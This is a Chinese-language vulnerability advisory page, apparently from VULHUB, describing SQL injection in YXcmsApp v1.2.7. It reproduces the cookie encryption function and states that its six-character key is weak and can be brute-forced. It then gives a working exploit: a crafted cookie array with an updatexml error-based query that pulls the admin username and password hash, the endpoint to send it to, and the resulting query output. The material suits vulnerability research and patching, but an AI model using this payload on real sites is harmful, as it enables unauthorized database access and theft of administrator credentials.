|YXcmsApp v1.2.7 暴力sql注入。 - VULHUB开源网络安全威胁库

YXcmsApp v1.2.7 暴力sql注入。

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： rt ### 详细说明： YXcmsApp 的cookie的加密用的都是dz的那个函数，看看密钥是怎么来的 protected/apps/install/controller/indexController.php ``` $this->randomcode= substr(md5(time()), 0, 6); ``` 唔。才6位，那么就很好破解了，(poc见测试代码) [<img src="https://images.seebug.org/upload/201501/151221288e2ed01c076c5b8e27f3e3f9a986a02b.jpg" alt="1216a35e2ca6f0a4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/151221288e2ed01c076c5b8e27f3e3f9a986a02b.jpg) 注册用户，抓包获取cookie yx_aut的值，利用poc得到key后，我们就能根据他的加密函数控制cookie了。 [<img src="https://images.seebug.org/upload/201501/151222401f76d4ff1727af0516efe7503a28f2b1.jpg" alt="e52c473f115e880b.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/151222401f76d4ff1727af0516efe7503a28f2b1.jpg) ``` function cp_encode($data,$key='',$expire = 0) { $string=serialize($data); $ckey_length = 4; $key = md5($key); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = substr(md5(microtime()), -$ckey_length); $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = sprintf('%010d', $expire ? $expire + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } return $keyc.str_replace('=', '', base64_encode($result)); } echo cp_encode("xxx",$key); ``` 下面就是找一个注入的地方咯~ /protected/apps/member/controller/orderController.php ``` public function orderadd() { $list=get_cookie($this->auth['id'].'shopcar'); if(!empty($list)){ $memberconfig=appConfig('member'); $data['ordersubject']=empty($list[1])?in($list[0]['name']):'合并付款'; $data['ordernum']=date("YmdHis").rand(0,100); $data['account']=$this->auth['account']; $data['freighttype']=in($_POST['type']); $data['freightpayment']=$memberconfig['PAYMENT']; $data['freight']=$memberconfig['MAIL_TYPE'][in($_POST['type'])][1];;//运费 $data['receivename']=in($_POST['uname']); $data['receivephone']=in($_POST['phone']); $data['receivemobile']=in($_POST['mobile']); $data['receiveaddress']=in($_POST['address']); $data['receivezip']=in($_POST['zip']); $data['total']=0; $data['ordertime']=time(); $data['state']=0; $data['mess']=in($_POST['mess']); foreach ($list as $value) { $value['ordernum']=$data['ordernum']; $id=model('orderDetail')->insert($value); if(!$id) $this->error('订单物品信息有误~'); $data['total']+=floatval($value['price'])*intval($value['num']); } ``` 可以看到将cookie的值传入了$list。然后带入了insert。 insert对字段做了过滤，对键的值却没有。赋值给$list为一个数组。键的值为注入语句即可造成注入。 ``` $a=array(array("code`) value('1' or 1 = updatexml(1,concat(0x5c,(SELECT concat(username,0x23,password) FROM yx_admin LIMIT 1)),1))#"=>"1","name"=>"1","pric"=>"1","num"=>"1")); echo cp_encode($a,"00e29y"); ``` 在 index.php?r=member/order/orderadd 修改cookie yx_1shopca，即可注入出数据。 ``` 173 QueryINSERT INTO yx_order_detail (`code`) value('1' or 1 = updatexml(1,concat(0x5c,(SELECT concat(username,0x23,password) FROM yx_admin LIMIT 1)),1))#`,`name`,`pric`,`num`,`ordernum`) VALUES ('1','1','1','1','2015010906301335') ``` [<img src="https://images.seebug.org/upload/201501/151228562d0ad42b8ea7c9bdfa2a90e316bec697.jpg" alt="cb8ec233dd7972dd.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/151228562d0ad42b8ea7c9bdfa2a90e316bec697.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201501/151228562d0ad42b8ea7c9bdfa2a90e316bec697.jpg" alt="cb8ec233dd7972dd.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/151228562d0ad42b8ea7c9bdfa2a90e316bec697.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™